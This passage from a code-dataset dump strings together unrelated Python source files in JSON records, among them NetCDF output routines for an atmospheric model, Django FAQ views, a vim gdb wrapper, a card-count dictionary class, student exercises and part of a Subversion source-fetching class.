'__main__':\n\n # local imports\n from genie.testbed import load\n import sys\n\n # set debug level DEBUG, INFO, WARNING\n logger.setLevel(logging.INFO)\n\n # Loading device information\n cwd = os.path.dirname(__file__)\n\n # If the python script is executed from the local directory, use local testbed\n if cwd == '': testbed = load(f'./testbed.yaml')\n # Else, the python script is executed from another directory, use testbed in the folder of the script\n else: testbed = load(f'{cwd}/testbed.yaml')\n\n aetest.main(testbed = testbed)","sub_path":"4_aetest/solution_example/4_aetest.py","file_name":"4_aetest.py","file_ext":"py","file_size_in_byte":2491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"131713822","text":"import numpy as np\nimport time\nfrom netCDF4 import Dataset\nfrom namelist import output_path, output_fields, pTop\nfrom namelist import i_radiation, \\\n i_microphysics, i_surface\nfrom IO_helper_functions import NC_output_diagnostics\n\n\ndef output_to_NC(GR, F, RAD, SURF, MIC):\n\n print('###########################################')\n print('###########################################')\n print('WRITE FIELDS '+str(GR.nc_output_count).zfill(4))\n print('###########################################')\n print('###########################################')\n\n # PREPARATIONS\n ####################################################################\n #VORT, F.PAIR, F.TAIR, WWIND_ms,\\\n VORT, WWIND_ms, WVP, CWP = NC_output_diagnostics(GR, F, F.UWIND, \n F.VWIND, F.WWIND, F.POTT, F.COLP, F.PVTF, F.PVTFVB,\n F.PHI, F.PHIVB, F.RHO, MIC)\n\n # CREATE AND OPEN FILE\n ####################################################################\n filename = output_path+'/out'+str(GR.nc_output_count).zfill(4)+'.nc'\n ncf = Dataset(filename, 'w', format='NETCDF4')\n ncf.close()\n ncf = Dataset(filename, 'a', format='NETCDF4')\n\n # DIMENSIONS\n ####################################################################\n time_dim = ncf.createDimension('time', None)\n bnds_dim = ncf.createDimension('bnds', 1)\n lon_dim = ncf.createDimension('lon', GR.nx)\n lons_dim = ncf.createDimension('lons', GR.nxs)\n lat_dim = ncf.createDimension('lat', GR.ny)\n lats_dim = ncf.createDimension('lats', GR.nys)\n level_dim = ncf.createDimension('level', GR.nz)\n levels_dim = ncf.createDimension('levels', GR.nzs)\n\n # DIMENSION VARIABLES\n ####################################################################\n dtime = ncf.createVariable('time', 'f8', ('time',) )\n bnds = ncf.createVariable('bnds', 'f8', ('bnds',) )\n lon = ncf.createVariable('lon', 'f4', ('lon',) )\n lons = ncf.createVariable('lons', 'f4', ('lons',) )\n lat = ncf.createVariable('lat', 'f4', ('lat',) )\n lats = ncf.createVariable('lats', 'f4', ('lats',) )\n level = ncf.createVariable('level', 'f4', ('level',) )\n levels = ncf.createVariable('levels', 'f4', ('levels',) )\n\n dtime[:] = GR.sim_time_sec/3600/24\n bnds[:] = [0]\n lon[:] = GR.lon_rad[GR.ii,GR.nb+1]\n lons[:] = GR.lonis_rad[GR.iis,GR.nb+1]\n lat[:] = GR.lat_rad[GR.nb+1,GR.jj]\n lats[:] = GR.latjs_rad[GR.nb+1,GR.jjs]\n level[:] = GR.level\n levels[:] = GR.levels\n\n ####################################################################\n ##############################################################################\n # 2D FIELDS\n ##############################################################################\n ####################################################################\n\n # pressure fields\n ##############################################################################\n if output_fields['PSURF']:\n PSURF_out = ncf.createVariable('PSURF', 'f4', ('time', 'lat', 'lon',) )\n PSURF_out[-1,:,:] = F.COLP[GR.iijj].T + pTop\n\n # flux fields\n ##############################################################################\n\n # velocity fields\n ##############################################################################\n\n # temperature fields\n ##############################################################################\n\n # primary diagnostic fields (relevant for dynamics)\n ##############################################################################\n\n # secondary diagnostic fields (not relevant for dynamics)\n ##############################################################################\n\n # constant fields\n ##############################################################################\n\n # radiation fields\n ##############################################################################\n\n # microphysics fields\n ##############################################################################\n\n\n\n ####################################################################\n ##############################################################################\n # 3D FIELDS\n ##############################################################################\n ####################################################################\n\n\n\n # pressure fields\n ##############################################################################\n\n # flux fields\n ##############################################################################\n \n # velocity fields\n ##############################################################################\n if output_fields['UWIND']:\n UWIND_out = ncf.createVariable('UWIND', 'f4', ('time', 'level', 'lat', 'lons',) )\n UWIND_out[-1,:,:,:] = F.UWIND[:,:,:][GR.iisjj].T\n if output_fields['VWIND']:\n VWIND_out = ncf.createVariable('VWIND', 'f4', ('time', 'level', 'lats', 'lon',) )\n VWIND_out[-1,:,:,:] = F.VWIND[:,:,:][GR.iijjs].T\n if output_fields['WIND']:\n WIND_out = ncf.createVariable('WIND', 'f4', ('time', 'level', 'lat', 'lon',) )\n WIND_out[-1,:,:,:] = F.WIND[:,:,:][GR.iijj].T\n if output_fields['WWIND']:\n WWIND_out = ncf.createVariable('WWIND', 'f4', ('time', 'levels', 'lat', 'lon',) )\n for ks in range(0,GR.nzs):\n WWIND_out[-1,ks,:,:] = (F.WWIND[:,:,ks][GR.iijj]*F.COLP[GR.iijj]).T\n #WWIND_out[-1,ks,:,:] = WWIND_ms[:,:,ks][GR.iijj].T\n if output_fields['VORT']:\n VORT_out = ncf.createVariable('VORT', 'f4', ('time', 'level', 'lat', 'lon',) )\n VORT_out[-1,:,:,:] = VORT[:,:,:][GR.iijj].T\n\n # temperature fields\n ##############################################################################\n if output_fields['POTT']:\n POTT_out = ncf.createVariable('POTT', 'f4', ('time', 'level', 'lat', 'lon',) )\n POTT_out[-1,:,:,:] = F.POTT[:,:,:][GR.iijj].T\n if output_fields['TAIR']:\n TAIR_out = ncf.createVariable('TAIR', 'f4', ('time', 'level', 'lat', 'lon',) )\n TAIR_out[-1,:,:,:] = F.TAIR[:,:,:][GR.iijj].T\n\n # primary diagnostic fields (relevant for dynamics)\n ##############################################################################\n if output_fields['PHI']:\n PHI_out = ncf.createVariable('PHI', 'f4', ('time', 'level', 'lat', 'lon',) )\n PHI_out[-1,:,:,:] = F.PHI[:,:,:][GR.iijj].T\n\n # secondary diagnostic fields (not relevant for dynamics)\n ##############################################################################\n if output_fields['PAIR']:\n PAIR_out = ncf.createVariable('PAIR', 'f4', ('time', 'level', 'lat', 'lon',) )\n PAIR_out[-1,:,:,:] = F.PAIR[:,:,:][GR.iijj].T\n if output_fields['RHO']:\n RHO_out = ncf.createVariable('RHO', 'f4', ('time', 'level', 'lat', 'lon',) )\n RHO_out[-1,:,:,:] = F.RHO[:,:,:][GR.iijj].T\n\n # constant fields\n ##############################################################################\n\n # radiation fields\n ##############################################################################\n\n # microphysics fields\n ##############################################################################\n if output_fields['QV']:\n QV_out = ncf.createVariable('QV', 'f4', ('time', 'level', 'lat', 'lon',) )\n QV_out[-1,:,:,:] = F.QV[:,:,:][GR.iijj].T\n if output_fields['QC']:\n QC_out = ncf.createVariable('QC', 'f4', ('time', 'level', 'lat', 'lon',) )\n QC_out[-1,:,:,:] = F.QC[:,:,:][GR.iijj].T\n if output_fields['WVP']:\n WVP_out = ncf.createVariable('WVP', 'f4', ('time', 'lat', 'lon',) )\n WVP_out[-1,:,:] = WVP.T\n if output_fields['CWP']:\n CWP_out = ncf.createVariable('CWP', 'f4', ('time', 'lat', 'lon',) )\n CWP_out[-1,:,:] = CWP.T\n\n\n\n ####################################################################\n ##############################################################################\n # PROFILES OF CERTAIN FIELDS\n ##############################################################################\n ####################################################################\n if output_fields['UWIND'] > 1:\n UWINDprof_out = ncf.createVariable('UWINDprof', 'f4', ('time', 'level', 'lat',) )\n if output_fields['VWIND'] > 1:\n VWINDprof_out = ncf.createVariable('VWINDprof', 'f4', ('time', 'level', 'lats',) )\n if output_fields['VORT'] > 1:\n VORTprof_out = ncf.createVariable('VORTprof', 'f4', ('time', 'level', 'lat',) )\n if output_fields['POTT'] > 1:\n POTTprof_out = ncf.createVariable('POTTprof', 'f4', ('time', 'level', 'lat',) )\n if output_fields['QV'] > 1:\n QVprof_out = ncf.createVariable('QVprof', 'f4', ('time', 'level', 'lat',) )\n if output_fields['QC'] > 1:\n QCprof_out = ncf.createVariable('QCprof', 'f4', ('time', 'level', 'lat',) )\n for k in range(0,GR.nz):\n if output_fields['UWIND'] > 1:\n UWINDprof_out[-1,GR.nz-k-1,:] = np.mean(F.UWIND[:,:,k][GR.iijj],axis=0)\n if output_fields['VWIND'] > 1:\n VWINDprof_out[-1,GR.nz-k-1,:] = np.mean(F.VWIND[:,:,k][GR.iijjs],axis=0)\n if output_fields['VORT'] > 1:\n VORTprof_out[-1,GR.nz-k-1,:] = np.mean(VORT[:,:,k][GR.iijj],axis=0)\n if output_fields['POTT'] > 1:\n POTTprof_out[-1,GR.nz-k-1,:] = np.mean(F.POTT[:,:,k][GR.iijj],axis=0)\n if output_fields['QV'] > 1:\n QVprof_out[-1,GR.nz-k-1,:] = np.mean(F.QV[:,:,k][GR.iijj],axis=0)\n if output_fields['QC'] > 1:\n QCprof_out[-1,GR.nz-k-1,:] = np.mean(F.QC[:,:,k][GR.iijj],axis=0)\n\n\n\n\n\n\n\n # RADIATION VARIABLES\n if i_radiation:\n SWDIFFLXDO_out =ncf.createVariable('SWDIFFLXDO', 'f4', ('time', 'levels', 'lat', 'lon',) )\n SWDIRFLXDO_out =ncf.createVariable('SWDIRFLXDO', 'f4', ('time', 'levels', 'lat', 'lon',) )\n SWFLXUP_out = ncf.createVariable('SWFLXUP', 'f4', ('time', 'levels', 'lat', 'lon',) )\n SWFLXDO_out = ncf.createVariable('SWFLXDO', 'f4', ('time', 'levels', 'lat', 'lon',) )\n SWFLXNET_out = ncf.createVariable('SWFLXNET', 'f4', ('time', 'levels', 'lat', 'lon',) )\n LWFLXUP_out = ncf.createVariable('LWFLXUP', 'f4', ('time', 'levels', 'lat', 'lon',) )\n LWFLXDO_out = ncf.createVariable('LWFLXDO', 'f4', ('time', 'levels', 'lat', 'lon',) )\n LWFLXNET_out = ncf.createVariable('LWFLXNET', 'f4', ('time', 'levels', 'lat', 'lon',) )\n dPOTTdt_RAD_out=ncf.createVariable('dPOTTdt_RAD', 'f4', ('time', 'level', 'lat', 'lon',) )\n #SWFLXDIV_out = ncf.createVariable('SWFLXDIV', 'f4', ('time', 'level', 'lat', 'lon',) )\n #LWFLXDIV_out = ncf.createVariable('LWFLXDIV', 'f4', ('time', 'level', 'lat', 'lon',) )\n\n # SURF VARIABLES\n if i_surface:\n if output_fields['SURFTEMP']:\n SURFTEMP_out = ncf.createVariable('SURFTEMP', 'f4', ('time', 'lat', 'lon',) )\n SURFTEMP_out[-1,:,:] = F.SOILTEMP[:,:,0].T\n #if i_microphysics:\n # SOILMOIST_out = ncf.createVariable('SOILMOIST', 'f4', ('time', 'lat', 'lon',) )\n # RAINRATE_out = ncf.createVariable('RAINRATE', 'f4', ('time', 'lat', 'lon',) )\n # ACCRAIN_out = ncf.createVariable('ACCRAIN', 'f4', ('time', 'lat', 'lon',) )\n # SOILEVAPITY_out = ncf.createVariable('SOILEVAPITY', 'f4', ('time', 'lat', 'lon',) )\n if i_radiation:\n if output_fields['SURFALBEDSW']:\n SURFALBEDSW_out = ncf.createVariable('SURFALBEDSW', 'f4',\n ('time', 'lat', 'lon',) )\n SURFALBEDSW_out[0,:,:] = F.SURFALBEDSW.T\n if output_fields['SURFALBEDLW']:\n SURFALBEDLW_out = ncf.createVariable('SURFALBEDLW', 'f4',\n ('time', 'lat', 'lon',) )\n SURFALBEDLW_out[0,:,:] = F.SURFALBEDLW.T\n\n\n # MICROPHYSICS VARIABLES\n if i_microphysics:\n RH_out = ncf.createVariable('RH', 'f4', ('time', 'level', 'lat', 'lon',) )\n dQVdt_MIC_out = ncf.createVariable('dQVdt_MIC', 'f4',\n ('time', 'level', 'lat', 'lon',) )\n dQCdt_MIC_out = ncf.createVariable('dQCdt_MIC', 'f4',\n ('time', 'level', 'lat', 'lon',) )\n dPOTTdt_MIC_out=ncf.createVariable('dPOTTdt_MIC', 'f4',\n ('time', 'level', 'lat', 'lon',) )\n\n\n\n ################################################################################\n ################################################################################\n ################################################################################\n\n if i_surface:\n pass\n #if i_microphysics:\n # SOILMOIST_out[-1,:,:] = SURF.MOIST.T\n # RAINRATE_out[-1,:,:] = SURF.RAINRATE.T*3600 # mm/h\n # ACCRAIN_out[-1,:,:] = SURF.ACCRAIN.T # mm\n # SOILEVAPITY_out[-1,:,:] = SURF.SOILEVAPITY.T\n\n\n for k in range(0,GR.nz):\n\n # RADIATION VARIABLES\n if i_radiation > 0:\n dPOTTdt_RAD_out[-1,k,:,:] = F.dPOTTdt_RAD[:,:,k].T * 3600\n #SWFLXDIV_out[-1,k,:,:] = RAD.SWFLXDIV[:,:,k].T \n #LWFLXDIV_out[-1,k,:,:] = RAD.LWFLXDIV[:,:,k].T \n\n # MICROPHYSICS VARIABLES\n if i_microphysics:\n RH_out[-1,k,:,:] = MIC.RH[:,:,k].T\n dQVdt_MIC_out[-1,k,:,:] = F.dQVdt_MIC[:,:,k].T * 3600\n dQCdt_MIC_out[-1,k,:,:] = F.dQCdt_MIC[:,:,k].T * 3600\n dPOTTdt_MIC_out[-1,k,:,:] = F.dPOTTdt_MIC[:,:,k].T * 3600\n\n\n\n for ks in range(0,GR.nzs):\n\n\n # RADIATION VARIABLES\n if i_radiation > 0:\n SWDIFFLXDO_out[-1,ks,:,:] = RAD.SWDIFFLXDO[:,:,ks].T\n SWDIRFLXDO_out[-1,ks,:,:] = RAD.SWDIRFLXDO[:,:,ks].T\n SWFLXUP_out[-1,ks,:,:] = RAD.SWFLXUP[:,:,ks].T\n SWFLXDO_out[-1,ks,:,:] = RAD.SWFLXDO[:,:,ks].T\n SWFLXNET_out[-1,ks,:,:] = F.SWFLXNET[:,:,ks].T\n LWFLXUP_out[-1,ks,:,:] = RAD.LWFLXUP[:,:,ks].T\n LWFLXDO_out[-1,ks,:,:] = RAD.LWFLXDO[:,:,ks].T\n LWFLXNET_out[-1,ks,:,:] = F.LWFLXNET[:,:,ks].T\n\n\n ncf.close()\n\n\n\n\ndef constant_fields_to_NC(GR, F, RAD, SURF):\n\n print('###########################################')\n print('###########################################')\n print('write constant fields')\n print('###########################################')\n print('###########################################')\n\n filename = output_path+'/constants.nc'\n\n ncf = Dataset(filename, 'w', format='NETCDF4')\n ncf.close()\n\n ncf = Dataset(filename, 'a', format='NETCDF4')\n\n # DIMENSIONS\n lon_dim = ncf.createDimension('lon', GR.nx)\n lons_dim = ncf.createDimension('lons', GR.nxs)\n lat_dim = ncf.createDimension('lat', GR.ny)\n lats_dim = ncf.createDimension('lats', GR.nys)\n level_dim = ncf.createDimension('level', GR.nz)\n levels_dim = ncf.createDimension('levels', GR.nzs)\n\n # DIMENSION VARIABLES\n lon = ncf.createVariable('lon', 'f4', ('lon',) )\n lons = ncf.createVariable('lons', 'f4', ('lons',) )\n lat = ncf.createVariable('lat', 'f4', ('lat',) )\n lats = ncf.createVariable('lats', 'f4', ('lats',) )\n level = ncf.createVariable('level', 'f4', ('level',) )\n levels = ncf.createVariable('levels', 'f4', ('levels',) )\n\n lon[:] = GR.lon_rad[GR.ii,GR.nb+1]\n lons[:] = GR.lonis_rad[GR.iis,GR.nb+1]\n lat[:] = GR.lat_rad[GR.nb+1,GR.jj]\n lats[:] = GR.latjs_rad[GR.nb+1,GR.jjs]\n level[:] = GR.level\n levels[:] = GR.levels\n\n\n # VARIABLES\n HSURF_out = ncf.createVariable('HSURF', 'f4', ('lat', 'lon',) )\n HSURF_out[:,:] = F.HSURF[GR.iijj].T\n\n # SURF VARIABLES\n if i_surface:\n OCEANMASK_out = ncf.createVariable('OCEANMASK', 'f4', ('lat', 'lon',) )\n OCEANMASK_out[:,:] = F.OCEANMASK.T\n\n # RADIATION VARIABLES\n ncf.close()\n\n\n","sub_path":"nc_IO.py","file_name":"nc_IO.py","file_ext":"py","file_size_in_byte":15950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"376658496","text":"def solve(grid):\r\n numbers = {}\r\n for i in grid:\r\n for j in i:\r\n if j in numbers:\r\n numbers[j] += 1\r\n else:\r\n numbers[j] = 1\r\n\r\n answer = []\r\n for i in numbers:\r\n if numbers[i] % 2 != 0:\r\n answer.append(int(i))\r\n answer.sort()\r\n answer = [str(i) for i in answer]\r\n answer = ' '.join(answer)\r\n\r\n return answer\r\n\r\ncases = int(input())\r\ngrids = []\r\n\r\nfor _ in range(cases):\r\n n = int(input())\r\n grid = []\r\n for _ in range((n*2)-1):\r\n grid.append(input().split())\r\n grids.append(grid)\r\n\r\nfor i, grid in enumerate(grids):\r\n print(\"Case #{}: {}\".format(i+1, solve(grid)))\r\n\r\n\r\n","sub_path":"codes/BuildLinks1.10/test_input/CJ_16_1/16_1_2_Steve99_two.py","file_name":"16_1_2_Steve99_two.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"281370560","text":"def main():\n from Prac07.guitar import Guitar\n guitars = []\n\n guitars.append([\"Gibson L-5 CES\", 1922, 16035.40])\n guitars.append([\"Line 6 JTV-59\", 2010, 1512.9])\n # test input ^\n\n # We should be appending an item that uses the Guitar Class to a list called \"guitars\":\n # guitars.append(Guitar(\"Gibson L-5 CES\", 1922, 16035.40))\n\n print(\"My guitars!\")\n loop = True\n while loop:\n guitar_name = input(\"Name: \")\n if guitar_name != \"\":\n guitar_year = int(input(\"Year: \")) # no type-error checking\n guitar_cost = float(input(\"Cost: $\")) # no type-error checking\n guitars.append([guitar_name, guitar_year, guitar_cost])\n print(guitars)\n else:\n loop = False\n\n print(\"These are my guitars:\")\n for item, guitar in enumerate(guitars):\n index = Guitar(guitar[0], guitar[1], guitar[2]) # bad var name\n print(\"Guitar {}: {} ({}), worth ${}\".format(item + 1, guitar[0], guitar[1], guitar[2]), end = '')\n if index.is_vintage():\n print(\"(vintage)\")\n else:\n print(\"\")\n\n # print should look like:\n # (\"Guitar {}: {:>20} ({}), worth ${:10,.2f} {}\".format(i + 1, guitar.name, guitar.year, guitar.cost, vintage_string))\n # The variable vintage_string is set to \"\" or \"(vintage)\" depending on the is_vintage() method\n\n # output should look like:\n # Guitar 1: Fender Stratocaster (2014), worth $ 765.40\n # Guitar 2: Gibson L-5 CES (1922), worth $ 16,035.40 (vintage)\n\n\nmain()\n","sub_path":"Prac07/ownedGuitars.py","file_name":"ownedGuitars.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"426807995","text":"def muestraMenorEdad():\n #Definir Variables y otros\n pnombre=\"\"\n pedad=0\n #Datos de entrada\n p1nombre=input(\"Ingrese Nombre 1ra Persona:\")\n p1edad=int(input(\"Ingrese edad 1ra Persona:\"))\n p2nombre=input(\"Ingrese Nombre 2da Persona:\")\n p2edad=int(input(\"Ingrese edad 2da Persona:\"))\n p3nombre=input(\"Ingrese Nombre 3ra Persona:\")\n p3edad=int(input(\"Ingrese edad 3ra Persona:\")) \n #Proceso\n if p1edad': (1, 0),\n '<': (-1, 0),\n 'v': (0, -1)}\n def next_pos(cur_pos, move):\n return tuple(cur_pos[i] + moves[move][i] for i in [0, 1])\n points = set([start_pos])\n for move in content:\n if move in moves:\n start_pos = next_pos(start_pos, move)\n points.add(start_pos)\n\n print(len(points))\n\n points = set([(0, 0)])\n santas_pos = [(0, 0), (0, 0)]\n for move_number, move in enumerate(filter(lambda m: m in moves, content)):\n santas_pos[move_number % 2] = next_pos(santas_pos[move_number % 2], move)\n points.add(santas_pos[move_number % 2])\n\n print(len(points))\n\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"day3/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"85674672","text":"import os\nimport inspect\nimport sys\n\ncurrentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))\nptyprocessdir = os.path.join(currentdir, \"../lib/ptyprocess\")\npexpectdir = os.path.join(currentdir, \"../lib/pexpect\")\npoyodir = os.path.join(currentdir, \"../lib/poyo\")\nsys.path.insert(0, currentdir)\nsys.path.insert(0, ptyprocessdir)\nsys.path.insert(0, pexpectdir)\nsys.path.insert(0, poyodir)\n\nimport pexpect\n\nimport vim\nimport re\n\nfrom command_handler import CommandHandler\nfrom config import Config\nimport symbols_status as SymbolsStatus\n\nclass Vgdb(object):\n\n def __init__(self):\n self.startup_commands = ''\n self.current_command = ''\n self.cmd_hnd = None\n self.entrypoint = None\n self.current_frame_address = ''\n self.config_dictionary = {}\n\n def start_gdb(self, commands):\n try:\n self.startup_commands = commands\n self.cmd_hnd = CommandHandler(commands)\n except Exception as ex:\n print(\"error in Vgdb.start_gdb(): \" + ex)\n\n def run_command_with_result(self, command, buffer_name=''):\n try:\n vim.command(\"let g:vg_query_result = []\")\n lines = self.cmd_hnd.run_command(command, buffer_name)\n if lines:\n for line in lines:\n vim.command(\"call add(g:vg_query_result, '\" + line + \"' )\")\n except Exception as ex:\n print(\"error in Vgdb.run_command(): \" + ex)\n\n def run_stepi(self):\n self.current_frame_address = self.cmd_hnd.run_command_get_match(\"stepi\", '(0x[0-9a-f]{2,16})')\n self.try_set_breakpoint()\n\n def run_continue(self):\n self.current_frame_address = self.cmd_hnd.run_command_get_match(\"continue\", '(0x[0-9a-f]{2,16})')\n self.try_set_breakpoint()\n\n def try_set_breakpoint(self):\n if self.current_frame_address:\n vim.command(\"let g:vg_current_frame_address = '\" + self.current_frame_address + \"'\")\n\n def display_disassembly(self):\n self.get_set_entrypoint()\n self.run_command_with_result(\"info breakpoints\", \"vg_breakpoints\")\n self.run_command_with_result(\"disassemble\", 'vg_disassembly')\n\n def get_set_entrypoint(self):\n if not self.entrypoint:\n self.entrypoint = self.cmd_hnd.run_command_get_match(\"info file\", 'Entry point: (0x[0-9a-f]{2,16})')\n if self.entrypoint:\n self.entrypoint = self.pad_hexadecimal_to_64bit(self.entrypoint)\n self.current_frame_address = self.entrypoint\n vim.command(\"let g:vg_app_entrypoint = '\" + self.entrypoint + \"'\")\n self.try_set_breakpoint()\n\n def pad_hexadecimal_to_64bit(self, hex_string):\n return '0x' + hex_string[2:].zfill(16)\n\n def run_to_entrypoint(self):\n self.get_set_entrypoint()\n if self.entrypoint:\n self.cmd_hnd.run_command(\"break *\" + self.entrypoint)\n remote_target = vim.eval('g:vg_remote_target')\n if remote_target:\n self.cmd_hnd.run_command(\"continue\")\n else:\n self.cmd_hnd.run_command(\"run\")\n else:\n print(\"error: unable to get entrypoint\")\n\n def get_config(self):\n self.config_dictionary = Config().get()\n","sub_path":"autoload/vgdb/vgdb.py","file_name":"vgdb.py","file_ext":"py","file_size_in_byte":3270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"514766548","text":"from django.shortcuts import render\nfrom learn.models import *\nfrom learn.forms import *\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.generic import CreateView\n\n\n@login_required\ndef faqs(request, module_id):\n values = dict()\n values['module'] = Module.objects.get(pk=module_id)\n values['title'] = values['module'].module_code+\" FAQ\"\n values['lectures'] = values['module'].lecture_set.all\n values['faqs'] = FAQQuestion.objects.filter(module=values['module'])\n values['modules'] = []\n\n courses = request.user.course.all()\n\n for course in courses:\n [values['modules'].append(module) for module in course.modules.all()]\n\n values['modules'] = set(values['modules'])\n\n return render(request, 'faqs.html', values)\n\nclass CreateFAQQuestionView(CreateView):\n model = FAQQuestion\n template_name = \"faqquestion_form.html\"\n\n def form_valid(self, form):\n faq_question = form.save(commit=False)\n faq_question.author = self.request.user\n faq_question.module = Module.objects.get(pk=self.kwargs['module_id'])\n faq_question.save()\n return super(CreateFAQQuestionView, self).form_valid(form)\n\n\nclass CreateFAQAnswerView(CreateView):\n model = FAQAnswer\n template_name = \"faqanswer_form.html\"\n\n\n def get_context_data(self, **kwargs):\n context = super(CreateFAQAnswerView, self).get_context_data(**kwargs)\n context['faq_id'] = self.kwargs['faq_id']\n return context\n\n def form_valid(self, form):\n faq_answer = form.save(commit=False)\n faq_answer.author = self.request.user\n faq_answer.question = FAQQuestion.objects.get(pk=self.kwargs['faq_id'])\n faq_answer.save()\n return super(CreateFAQAnswerView, self).form_valid(form)","sub_path":"CM2301/learn/views/faq.py","file_name":"faq.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"164803313","text":"class CardCounts(dict):\n def __init__(self, *args, **kwargs):\n self.count = 0\n dict.__init__(self, *args, **kwargs)\n def __getitem__(self, idx):\n self.setdefault(idx, 0)\n return dict.__getitem__(self, idx)\n def __setitem__(self, key, value):\n if value <= 0:\n self.count -= self[key]\n del self[key]\n else:\n self.count -= (self[key] - value)\n dict.__setitem__(self, key, value)\n\n def sortedKeys(self):\n sortedItems = self.items()\n compare = lambda x, y: sign(y[1] - x[1])\n sortedItems.sort(cmp=compare)\n return [x[0] for x in sortedItems]\n\n def totalCount(self):\n return self.count\n '''\n Return probabilities for each card\n '''\n def normalize(self):\n total = float(self.totalCount())\n if total == 0: return\n for key in self.keys():\n self[key] = self[key] / total\n self.count = 1\n\n def divideAll(self, divisor):\n divisor = float(divisor)\n for key in self:\n self[key] /= divisor\n self.count /= divisor\n\n def copy(self):\n return CardCounts(dict.copy(self))\n\n def __mul__(self, y ):\n sum = 0\n x = self\n if len(x) > len(y):\n x,y = y,x\n for key in x:\n if key not in y:\n continue\n sum += x[key] * y[key]\n return sum\n\n def __radd__(self, y):\n for key, value in y.items():\n self[key] += value\n self.count += value\n\n def __add__( self, y ):\n addend = CardCounts()\n for key in self:\n if key in y:\n addend[key] = self[key] + y[key]\n else:\n addend[key] = self[key]\n addend.count += addend[key]\n for key in y:\n if key in self:\n continue\n addend[key] = y[key]\n addend.count += addend[key]\n return addend\n\n def decKey(self, key, num=1):\n curr = self[key]\n self[key] = curr - num if curr > num else 0\n self.count -= num if curr > num else 0\n if not self[key]:\n del self[key]\n\n def __sub__( self, y ):\n addend = CardCounts()\n for key in self:\n if key in y:\n addend[key] = self[key] - y[key]\n else:\n addend[key] = self[key]\n addend.count += addend[key]\n for key in y:\n if key in self:\n continue\n addend[key] = -1 * y[key]\n addend.count += addend[key]\n return addend\n\n\n","sub_path":"util/Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":2624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"172430240","text":"#\r\n# copyright (c) 2009 Ralf Habacker \r\n#\r\n# subversion support\r\n## \\todo needs dev-utils/subversion package, add some kind of tool requirement tracking for SourceBase derived classes\r\n\r\nfrom Source.VersionSystemSourceBase import *\r\n\r\nclass SvnSource (VersionSystemSourceBase):\r\n \"\"\"subversion support\"\"\"\r\n def __init__(self, subinfo=None):\r\n utils.trace( \"SvnSource.__init__\", 2 )\r\n if subinfo:\r\n self.subinfo = subinfo\r\n VersionSystemSourceBase.__init__( self )\r\n self.options = None\r\n ## \\todo add internal dependency for subversion package\r\n self.svnInstallDir = os.path.join(self.rootdir, 'dev-utils', 'svn', 'bin')\r\n\r\n def checkoutDir( self, index=0 ):\r\n utils.trace( \"SvnSource.checkoutDir\", 2 )\r\n if self.subinfo.hasSvnTarget():\r\n u = self.getUrl(index)\r\n (url, dummy) = self.splitUrl(u)\r\n\r\n if url.find(\"://\") == -1:\r\n if os.getenv(\"KDESVNDIR\") == None:\r\n sourcedir = os.path.join( self.downloadDir(), \"svn-src\", \"kde\", url )\r\n else:\r\n sourcedir = os.path.join( os.getenv(\"KDESVNDIR\"), url )\r\n else:\r\n sourcedir = os.path.join( self.downloadDir(), \"svn-src\" )\r\n sourcedir = os.path.join( sourcedir, self.package )\r\n _, path = self.__splitPath(url)\r\n if path and utils.envAsBool(\"EMERGE_SVN_STDLAYOUT\"):\r\n sourcedir = os.path.join( sourcedir, path )\r\n else:\r\n utils.die(\"svnTarget property not set for this target\")\r\n\r\n if self.subinfo.targetSourceSuffix() != None:\r\n sourcedir = \"%s-%s\" % (sourcedir, self.subinfo.targetSourceSuffix())\r\n\r\n return sourcedir\r\n\r\n def applyPatch(self, fileName, patchdepth, unusedSrcDir=None):\r\n \"\"\"apply a patch to a svn repository checkout\"\"\"\r\n utils.trace( \"SvnSource.applyPatch\", 2 )\r\n if fileName:\r\n patchfile = os.path.join (self.packageDir(), fileName)\r\n # @todo check if this could be merged into SourceBase.applyPatch\r\n if self.noCopy:\r\n srcdir = self.sourceDir()\r\n else:\r\n srcdir = self.buildDir()\r\n return utils.applyPatch(srcdir, patchfile, patchdepth)\r\n return True\r\n\r\n def setProxy(self):\r\n \"\"\"set proxy for fetching sources from subversion repository\"\"\"\r\n (host, port, username, password) = self.proxySettings()\r\n if host == None:\r\n return\r\n\r\n proxyOptions = \" --config-option servers:global:http-proxy-host=%s\" % host\r\n proxyOptions += \" --config-option servers:global:http-proxy-port=%s\" % port\r\n if username != None:\r\n proxyOptions += \" --config-option servers:global:http-proxy-username=%s\" % username\r\n proxyOptions += \" --config-option servers:global:http-proxy-password=%s\" % password\r\n\r\n self.options = proxyOptions\r\n\r\n def fetch( self, repopath = None ):\r\n \"\"\" checkout or update an existing repository path \"\"\"\r\n utils.trace( \"SvnSource.fetch\", 2 )\r\n if self.noFetch:\r\n utils.debug( \"skipping svn fetch (--offline)\" )\r\n return True\r\n\r\n if not os.path.exists(self.svnInstallDir):\r\n utils.die(\"required subversion package not installed in %s\" % self.svnInstallDir)\r\n\r\n for i in range(self.repositoryUrlCount()):\r\n if repopath:\r\n url = repopath\r\n else:\r\n url = self.repositoryUrl(i)\r\n self.__tryCheckoutFromRoot(url, self.checkoutDir(i), self.repositoryUrlOptions(i) != 'norecursive')\r\n return True\r\n\r\n def __getCurrentRevision( self ):\r\n \"\"\" return the revision returned by svn info \"\"\"\r\n\r\n revision = None\r\n # first, change the output to always be english\r\n if \"LANG\" in 